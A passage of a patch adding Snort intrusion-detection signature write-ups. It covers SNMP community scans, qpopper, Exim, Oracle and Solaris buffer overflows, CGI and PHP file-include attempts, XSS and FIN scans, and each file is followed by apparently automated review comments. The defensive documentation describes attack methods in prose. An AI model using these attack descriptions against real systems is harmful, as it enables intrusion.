+Devices running SNMP daemons with 'public' community enabled.
+
+--
+
+Attack Scenarios:
+An attacker scans a range of IPs for SNMP servers having the 'public' 
+community set and gathers information about the hosts.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable the 'public' and 'private' communities before connecting the 
+device with SNMP on the Internet or block access to SNMP ports using a 
+packet filtering firewall for unauthorized addresses.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0013
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0012
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0517
+
+--
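Review bot: Detailed Information says implementations "come pre-configured with 'public' and 'public' communities", repeating the same name; Corrective Action refers to "the 'public' and 'private' communities", so the second 'public' should read 'private'. The Summary says the event fires for an SNMP connection over TCP, but the rest of the text discusses SNMP v1 communities generally; state that the rule covers only the TCP transport so analysts do not assume UDP queries with the 'public' community are also detected. Minor: "the attacker can gather" should be "an attacker can gather".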
--- /dev/null
+++ b/doc/signatures/2364.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2364
+
+--
+Summary:
+This event is generated when an attempt is made to access a file that
+has a known vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made access the file
+options_form.php used in the PHP application Cyboards. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	Cyboards Cyboards PHP Lite 1.21
+	Cyboards Cyboards PHP Lite 1.25
+
+--
+Attack Scenarios:
+My manipulating certain variables contained in a PHP script an attacker
+may be able to supply code of their choosing and execute it on the
+server.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
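Review bot: Two wording errors: Detailed Information reads "an attempt is made access the file options_form.php" (missing "to"), and Attack Scenarios opens "My manipulating certain variables" where "By manipulating" is meant. "the attackers choosing" in Impact and Detailed Information should be "the attacker's choosing". Additional References is empty even though Affected Systems pins the issue to Cyboards PHP Lite 1.21 and 1.25; a vendor or advisory reference would let an analyst confirm the affected versions.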
--- /dev/null
+++ b/doc/signatures/1937.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1937
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability using the LIST command on mail servers running 
+the qpopper daemon.
+
+--
+Impact: Remote Access. 
+This attack can allow an attacker to read other users mail as the Group 
+ID mail.
+
+--
+Detailed Information: 
+The attacker needs the username and password of a POP account on the 
+server.  After a successful POP login, the attacker can cause a buffer 
+overflow using the LIST command.  After successfully exploiting the 
+qpopper daemon the attacker has remote access of the server with the UID
+of the username used for the POP login and the GID of 'mail'.
+
+--
+Affected Systems: 
+	Qualcomm qpopper 3.0 and 3.0 beta 1 through beta 29.
+
+--
+Attack Scenarios: 
+An attacker can log in to a vulnerable mail server using a preexisting 
+POP account and enter an overly long argument with the LIST command, 
+causing a buffer overflow which may then result in remote access.
+
+--
+Ease of Attack: 
+Simple.  Exploits exist.
+
+--
+False Positives: 
+None known.
+
+--
+False Negatives: 
+None Known.
+
+--
+Corrective Action: 
+Upgrade to Qualcomm qpopper 3.0 beta 30 or higher.
+
+--
+Contributors: 
+Snort documentation contributed by Chris Davis <christopher.davis@guardent.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:  
+cve: CAN-2000-0096
+bugtraq: 948
+
+--
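Review bot: The Impact section places its first sentence on the header line ("Impact: Remote Access."), unlike every other file in this patch where the header stands alone; move "Remote Access." to the following line. "read other users mail" needs an apostrophe ("users' mail"). Additional References lists "cve: CAN-2000-0096" and "bugtraq: 948" as bare identifiers, while sid 1618 and sid 1412 use a "CVE"/"Bugtraq" label followed by a full URL; use the same format here. Capitalisation of "None known." (False Positives) and "None Known." (False Negatives) is also inconsistent within the file.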
--- /dev/null
+++ b/doc/signatures/1467.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1467
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
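Review bot: This is the same generic CGI text as sid 1788 and carries the same typos: "running ona web server" and "the attackers choosing". With Additional References empty and no script name anywhere in the file, the write-up for sid 1467 is word-for-word indistinguishable from 1788, 1557, 1222, 1466 and 1090 in this patch; add the file or request the rule matches so the entry documents something rule-specific.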
--- /dev/null
+++ b/doc/signatures/1835.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+1835
+
+--
+Summary:
+This event is generated when a cross-site scripting attack is being 
+attempted, or a potential attacker is testing your site to determine if 
+it is vulnerable.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of 
+your web site. Attackers can potentially gain access to your users' 
+cookies or session ids, allowing the attacker to impersonate your
+user. They could also set up elaborate fake logon screens to steal 
+user names and passwords.
+
+--
+Detailed Information:
+Whenever a web application accepts input (either via the URL or the 
+POST method) and then uses that input as part of the HTML of a new page 
+without filtering, the application is vulnerable to cross-site 
+scripting.  The traditional means of exploiting this is to embed a 
+"<SCRIPT>" tag into the input. The code following the tag is then 
+executed by the victim's browser.
+
+--
+Affected Systems:
+Many older versions of web server software are affected, as are numerous
+web applications.
+
+--
+Attack Scenarios:
+The most common avenue of attack is for the attacker to send an HTML 
+formatted email to the victim. The email will contain a link to a 
+specially crafted URL which contains the exploit. When the victim clicks
+on the link, they are directed to the vulnerable web site and the attack
+code is executed by their browser.
+
+--
+Ease of Attack:
+Moderately Easy.  Exploit code exists to automate attacks against users 
+of some widely deployed web applications which are known to be 
+vulnerable. 
+
+Finding vulnerabilities in other, including proprietary, web
+applications is fairly trivial and existing exploit code could easily be
+modified to take advantage of newly discovered vulnerabilities.
+
+--
+False Positives:
+Web pages that legimately include the <SCRIPT> tag could generate this 
+event under certain circumstances.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Determine if your web application is actually vulnerable to this 
+attack. If it is and the application is not of your own design, contact 
+the authors or vendor and see if there is a patch or newer version.
+
+If the application is proprietary to you or your company, ensure that it 
+properly validates input.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+--
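Review bot: "legimately" in False Positives should be "legitimately". The False Positives section is the only place that reveals what the rule actually matches (a "<SCRIPT>" tag in the request); Detailed Information says the traditional exploit "is to embed a '<SCRIPT>' tag" but never states that this is the detection criterion, so say so in the Summary or Detailed Information. Additional References is empty; a general cross-site scripting reference would help readers who are new to the attack class.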
--- /dev/null
+++ b/doc/signatures/621.txt
@@ -0,0 +1,66 @@
+Rule:
+--
+Sid:
+621
+--
+Summary:
+A tcp packet with only it's FIN flag set was detected.
+
+--
+Impact:
+Information regarding firewall rulesets, open/closed ports, ACLs, and
+possibly even OS type may be disclosed.  This technique can also be
+used to bypass certain firewalls or traffic filtering/shaping devices.
+
+--
+Detailed Information:
+A tcp packet with only it's FIN flag set was detected.  Most Windows
+machines will respond with an ACK-RST regardless of whether or not the
+port is open.  Most *nix systems will respond with an ACK-RST if the
+port is closed and will not respond at all if the port is open.
+Actual responses may vary.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of information gathering leading up to another (more directed)
+attack, an attacker may attempt to figure out what ports are
+open/closed on a remote machine.
+
+--
+Ease of Attack:
+Intermediate.  To initiate an attack of this type, an attacker either
+needs a tool that can send packets with only the FIN flag set or
+the ability to craft their own packets.  The former is easy, the later
+requires a more advanced skillset.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Determine if this particular port would have responded as being open
+or closed.  If open, watch for more attacks on this particular service
+or from the remote machine that sent the packet.  If closed, simply
+watch for more traffic from this host.  Consider filtering this type
+of traffic at the ingress points of your network.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org>
+
+-- 
+Additional References:
+
+--
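Review bot: "it's FIN flag" (Summary and Detailed Information) should be "its FIN flag", "the later requires" in Ease of Attack should be "the latter requires", and "unkown" in Contributors should be "unknown". Structurally, the blank lines after "Rule:" and after the Sid value are missing, so "Rule:", "--", "Sid:", "621", "--" run together unlike the other files, and Affected Systems contains only a whitespace line; either list the affected systems or state explicitly that the technique is not platform-specific. False Positives says "None Known" even though the Summary says any packet with only the FIN bit set triggers the event; consider whether non-malicious sources of FIN-only packets should be mentioned.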
--- /dev/null
+++ b/doc/signatures/2643.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2643
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "ensure_not_published" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "fname" variable to
+cause the overflow. The result could permit the attacker to gain
+escalated privileges and run code of their choosing. This attack
+requires an attacker to logon to the database with a valid
+username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck96.html
+
+--
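Review bot: "a Oracle database implementation" in Summary should be "an Oracle database implementation", and "to logon to the database" in Attack Scenarios should be "to log on". The sentence "If you are running Oracle on a Windows server, make sure that the variable $ORACLE_PORTS is set to a value of 'any'" is a Snort deployment instruction, not information about the vulnerability; it belongs in Corrective Action or a separate deployment note rather than Detailed Information, and the reason (which ports Oracle listens on under Windows) should be given. Attack Scenarios correctly notes that a valid username and password are required; Ease of Attack says only "Simple." and should reflect that precondition.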
--- /dev/null
+++ b/doc/signatures/1557.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1557
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
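Review bot: The text repeats the sid 1788 boilerplate, typos included ("running ona web server", "the attackers choosing"). Nothing identifies which CGI application sid 1557 covers, and Additional References is empty; an analyst receiving this alert cannot tell it apart from the other generic CGI entries in this patch, so add the script name and a reference.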
--- /dev/null
+++ b/doc/signatures/1222.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1222
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
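Review bot: "running ona web server" and "the attackers choosing" need fixing here as in the other generic CGI entries. The write-up never names the CGI script or request that sid 1222 matches and leaves Additional References empty, so the documentation does not help an analyst verify the alert; add the rule-specific detail.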
--- /dev/null
+++ b/doc/signatures/100000721.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000721
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "login.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "login.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
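Review bot: The Attack Scenarios text (an attacker supplying credentials to an authentication mechanism) is the generic CGI boilerplate and does not describe the remote file include via the "phpraid_dir" parameter of "login.php" that the Summary documents; describe that instead. In Detailed Information the two generic paragraphs appear in the reverse order from the other files (the "If stringent input checks" paragraph precedes the "This event is generated when an attempt is made to gain unauthorized access" paragraph), and the latter still contains "running ona web server"; "the attackers choosing" should be "the attacker's choosing". Layout is also inconsistent: the file opens with two blank lines, the "--" separators after the Sid value, after Affected Systems and after Contributors lack the blank line used elsewhere, and there is a stray blank line after the closing "--".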
--- /dev/null
+++ b/doc/signatures/1950.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+1950
+
+--
+Summary:
+This event is generated when an attempt is made to register a Remote Procedure Call (RPC) program to the portmapper.  RPC is a facility that enables a machine to request a service from another remote machine. This is done without the need for detailed network information. Some versions of RPC have a vulnerability that allows a remote host to register applications from a spoofed source. 
+
+ -- 
+Impact:
+Attempted remote access.  This may be an attempt to maliciously register a program with the portmapper.
+
+--
+Detailed Information:
+Certain versions of rpcbind portmapper contain a flaw that can allow an attacker capable of spoofing TCP packets to register arbitrary RPC programs. It is possible for the attacker to gain root access depending on the RPC service registered.  
+
+-- 
+Affected Systems: 
+All machines running vulnerable RPC services.
+
+--
+Attack Scenarios:
+The attacker could potentially spoof TCP packets using pmap_set to register an RPC service. 
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule writer Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+
+--
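Review bot: The separator after Summary is " -- " with a leading space, unlike the "--" used everywhere else, and the file ends after Contributors without the "Additional References:" section every other file in this patch carries. The Summary and Detailed Information say "Some versions" / "Certain versions of rpcbind portmapper" without naming them, and Affected Systems says only "All machines running vulnerable RPC services"; name the affected rpcbind versions or add a reference. Attack Scenarios mentions "pmap_set" with no explanation; spelling out that this is the portmapper set request (PMAPPROC_SET) would help analysts relate the alert to the traffic they see.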
--- /dev/null
+++ b/doc/signatures/1466.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1466
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
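Review bot: Same generic CGI text and same typos as sid 1788 ("running ona web server", "the attackers choosing"). The file does not say which script sid 1466 matches and Additional References is empty; without that detail this entry duplicates 1788, 1467, 1557, 1222 and 1090 in this patch rather than documenting its own rule.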
--- /dev/null
+++ b/doc/signatures/795.txt
@@ -0,0 +1,62 @@
+
+Rule:  
+
+--
+Sid:
+795
+
+--
+Summary:
+This rule has been placed in deleted.rules. It has been superceded by
+sid 721.
+
+--
+Impact:
+Mail worms may spread rapidly because users execute them.
+
+--
+Detailed Information:
+Windows systems are often configured not to display file extensions.
+By adding a second extension, users get confused and think that an
+executable is a text - e.g. loveletter.txt.vbs gets displayed as
+loveletter.txt but is a visual basic script and not a plain text.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Famous worms (ILOVEYOU, KOURNIKOVA) are based on this method.
+
+--
+Ease of Attack:
+Very easy. One needs to attach a file and hope that it gets executed.
+
+--
+False Positives:
+None Known
+Could be an error on sender's side.
+
+--
+False Negatives:
+None Known
+-
+
+--
+Corrective Action:
+Use antivirus software. Configure mail clients securely, especially when
+using windows desktops. Educate your mail users. Deny all attachments at
+the gateway if you can.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by tobias.haecker@to.com
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+See websites of antivirus companies.
+
+--
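Review bot: "superceded" in Summary should be "superseded". The file opens with a stray blank line, a lone "-" line sits between False Negatives and the next "--" separator, and Affected Systems contains only a whitespace line. False Positives contradicts itself by saying "None Known" and then "Could be an error on sender's side."; keep one statement. Since the Summary says the rule lives in deleted.rules and is superseded by sid 721, the rest of the write-up (double-extension attachments) is orphaned here; either point the reader to the sid 721 documentation or keep only the deletion note. "think that an executable is a text" in Detailed Information should read "a text file".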
--- /dev/null
+++ b/doc/signatures/1829.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1829
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
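Review bot: "the attackers choosing" in Impact should be "the attacker's choosing". More substantively, the text never says what sid 1829 actually matches: Detailed Information says "the attack scenarios are legion" and Additional References is empty, which leaves an analyst with nothing to verify. Name the web server or application and the request pattern the rule keys on.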
--- /dev/null
+++ b/doc/signatures/1090.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1090
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
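Review bot: Neither Summary nor Detailed Information names the CGI script or the vulnerability this SID matches, so the reader cannot judge the "Exploits exist" claim, and Additional References is empty; state the script path the rule keys on and cite the advisory. Also "ona web server" in Detailed Information should read "on a web server".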
--- /dev/null
+++ b/doc/signatures/300.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid: 300
+
+--
+Summary:
+This event is generated when a buffer overflow attempt is made against a host running Solaris x86.
+
+--
+Impact:
+System compromize presenting the attacker with the opportunity to
+execute arbitrary code or gain remote access to the victim host.
+
+--
+Detailed Information:
+A buffer overflow condition exists in the nlps_server daemon on certain versions of Solaris for x86 architecture.
+
+nlps_server is a network listener used for printing services. The buffer overflow can be generated by sending an excessively long string of characters to the daemon on port 2766 followed by the command to be executed.
+
+Affected Systems:
+	Solaris 2.4, 2.5 and 2.51 for x86
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2319
+
+--
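Review bot: The "--" separator between Detailed Information and Affected Systems is missing (the paragraph about port 2766 is followed by a blank line and then "Affected Systems:"), which breaks the section layout every other file in this patch follows. Also "compromize" should be "compromise", "Solaris 2.51" should read "2.5.1", and "Sid: 300" puts the value on the heading line, unlike the other files which put it on the next line.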
--- /dev/null
+++ b/doc/signatures/2592.txt
@@ -0,0 +1,68 @@
+Rule:
+
+
+--
+Sid:
+2592
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Mail Transfer Agent Exim.
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code on a vulnerable
+server with the privilege of the process running Exim.
+
+--
+Detailed Information:
+Exim is vulnerable to a buffer overflow, permitting an attacker to execute
+arbitrary code.  The vulnerability may be exploited if Exim is configured to
+verify header syntax in the e-mail message body.  This is not the default
+configuration.  If an attacker supplies a large number of spaces after certain
+header fields, it may be possible to cause a buffer overflow.
+
+--
+Affected Systems:
+Exim prior to version 4.34
+
+--
+Attack Scenarios:
+An attacker can create and send mail with a malformed header,
+possibly causing a buffer overflow and permitting the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/10291
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0400
+
+Other:
+http://www.guninski.com/exim1.html
+
+--
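Review bot: "verify header syntax in the e-mail message body" is misleading; the overflow is in header checking, not body handling, and the non-default option the text alludes to is Exim's headers_check_syntax. Name it, since that configuration is the precondition for both the attack and the relevance of this rule. Also "Additional References" lacks the colon the other files use, and the False Negatives section needs a blank line before its "--".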
--- /dev/null
+++ b/doc/signatures/359.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
